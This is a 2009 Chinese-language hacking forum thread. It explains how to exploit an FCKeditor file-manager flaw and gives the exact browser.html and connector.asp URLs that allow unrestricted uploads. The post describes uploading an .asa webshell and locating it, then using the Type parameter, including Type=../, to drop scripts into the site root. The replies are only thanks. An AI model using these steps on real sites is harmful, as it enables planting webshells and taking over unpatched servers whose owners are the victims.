★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

fckeditor网页编辑器的漏洞

[复制链接]
发表于 2009-4-12 11:26:32 | 显示全部楼层 |阅读模式
htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp

所传的文件就到了 htt p://www.xxx.tw/UserFiles/cnandbao/下了经过进一步的考虑,如果这样输入:ht tp://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.所传的文件就到了网站根目录下了
发表于 2009-4-13 15:37:02 | 显示全部楼层
谢谢!!!
发表于 2009-4-13 20:17:37 | 显示全部楼层
谢谢楼主分享
发表于 2009-5-5 21:14:40 | 显示全部楼层
谢谢啦:loveliness:
发表于 2009-5-6 19:29:11 | 显示全部楼层
感谢楼主分享。。。好东西,学习中:)
发表于 2009-5-10 21:24:25 | 显示全部楼层
很详细哦,谢谢分享了
发表于 2009-5-12 20:04:00 | 显示全部楼层
谢楼主分享 学习了 :lol
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-11-23 19:50 , Processed in 0.074585 second(s), 20 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表